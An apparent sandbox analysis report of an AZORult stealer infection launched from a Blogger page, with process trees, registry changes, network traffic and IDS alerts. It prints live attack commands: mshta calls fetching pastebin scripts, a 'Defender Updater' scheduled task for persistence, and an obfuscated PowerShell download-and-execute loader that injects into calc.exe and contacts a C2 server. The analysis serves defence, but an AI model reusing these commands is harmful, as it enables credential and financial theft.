download: | john.html |
Full analysis: | https://app.any.run/tasks/39ec71a2-31b9-4374-bb3f-1f64cdf3d013 |
Verdict: | Malicious activity |
Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
Analysis date: | July 11, 2019, 13:43:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines |
MD5: | DCB1AA86FABDBA8712A4D1ADCFDB0571 |
SHA1: | D672EF3C4CB85EA5E73EA53889D1C74BFEE68B5E |
SHA256: | BF1794B8A7621AC5798D61658A8A3DB7B91362B68B9A88765A0523C19590D0F8 |
SSDEEP: | 768:uG3eyHHvPWdoaTwOkxWXnFooCil/g2SpT:uG3LHH2dTTwOKWX9Cil/e |
.html | | | HyperText Markup Language (100) |
---|
Title: | createdbymewithdeniss: john |
---|---|
Rating: | adult |
Generator: | blogger |
ContentType: | text/html; charset=UTF-8 |
viewport: | width=1100 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3112 | "C:\Windows\System32\mshta.exe" https://createdbymewithdeniss.blogspot.com/p/john.html | C:\Windows\System32\mshta.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2388 | "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/3VczmYsx | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2708 | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2904 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,76,67,74,53,89,121,104,122,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,85,99,110,65,85,78,118,74,39,41,46,114,101,112,108,97,99,101,40,39,33,33,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1908 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/rd9puWAp" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3828 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4040 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3860 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3472 | taskkill /f /im POWERPNT.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2112 | "{path}" | C:\WINDOWS\system32\calc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Calculator Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3112) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (3112) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (3112) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3112) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
(PID) Process: | (3112) mshta.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2388) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2388) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2388) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (2388) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
(PID) Process: | (2388) mshta.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_1 | — | |
MD5:— | SHA256:— | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BLXGUI4WKY4332L6I5.temp | — | |
MD5:— | SHA256:— | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\3399642339-ieretrofit[1].js | html | |
MD5:BE2B0433B22D6FC049F1B2D75DAAF7FA | SHA256:7186786ED5A17B3DB11B7BE7B4EFF0E2A95FDE616D81E68FEE6530F7523FB6E9 | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\john[1].html | html | |
MD5:1C9C53447EDB5748DE788FA8ED52A214 | SHA256:FEAE3B2F36AC755D9F22A393F3B98D47B33E0F80AAC20301D99B0D4F91B967B5 | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js | html | |
MD5:9EE08AD2448D931C3350F8EFB31B9583 | SHA256:045A89DA56E925603D6AE87BD25C68A06487B706CB75CD41138614995118D32E | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2 | text | |
MD5:DFCA983F4B2AFD0472667416B99E0F9A | SHA256:B88D9432A00CFA0D6CFDC1F55AD27E75B029B638075C68E1DE32EB5A5DC0B943 | |||
2388 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\3VczmYsx[1].txt | html | |
MD5:ED4BD6B5E56526C4C2221380DB37C224 | SHA256:E4E12E42E568F8A461D040C8B4E1B9E3BD06B9ACF7E3AFC6A49892F18B3FECBF | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1] | text | |
MD5:35FE91C2AC1BA0913CC617622B9EB43F | SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837 | |||
3112 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text | |
MD5:F82F6EC87A3028212B9AD7951BB23C1D | SHA256:CF2FF2B5C435D2EE08C7A08D3A033997B932DF284452A2EB68D767D32743D712 | |||
3112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\1501421786-widgets[1].js | text | |
MD5:65CAB1DA9A68D9FC06C0CEEA26E1879F | SHA256:75033E75836DE28AF64FA0ABCDEEC178DF9DB9446A09BEA2A8E9E72958466B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2388 | mshta.exe | GET | 301 | 104.20.208.21:80 | http://www.pastebin.com/raw/3VczmYsx | US | html | 2.02 Kb | shared |
2112 | calc.exe | POST | 200 | 149.56.223.205:80 | http://149.56.223.205/john/index.php | CA | txt | 4.27 Mb | malicious |
2112 | calc.exe | POST | 200 | 149.56.223.205:80 | http://149.56.223.205/john/index.php | CA | text | 5 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3112 | mshta.exe | 216.58.205.226:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
3112 | mshta.exe | 172.217.22.9:443 | www.blogger.com | Google Inc. | US | whitelisted |
— | — | 172.217.18.173:443 | accounts.google.com | Google Inc. | US | whitelisted |
3112 | mshta.exe | 172.217.16.137:443 | resources.blogblog.com | Google Inc. | US | unknown |
3112 | mshta.exe | 172.217.16.174:443 | apis.google.com | Google Inc. | US | whitelisted |
3112 | mshta.exe | 172.217.22.33:443 | createdbymewithdeniss.blogspot.com | Google Inc. | US | whitelisted |
2388 | mshta.exe | 104.20.208.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
2388 | mshta.exe | 104.20.209.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
2388 | mshta.exe | 104.20.209.21:443 | www.pastebin.com | Cloudflare Inc | US | shared |
2112 | calc.exe | 149.56.223.205:80 | — | OVH SAS | CA | malicious |
Domain | IP | Reputation |
---|---|---|
createdbymewithdeniss.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
apis.google.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
www.pastebin.com |
| shared |
pastebin.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2388 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2112 | calc.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2112 | calc.exe | A Network Trojan was detected | AV TROJAN Azorult CnC Beacon |
2112 | calc.exe | A Network Trojan was detected | AV TROJAN AZORult CnC Beacon |
2112 | calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2112 | calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
2112 | calc.exe | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
2112 | calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
2112 | calc.exe | A Network Trojan was detected | AV TROJAN Azorult CnC Beacon |
2112 | calc.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |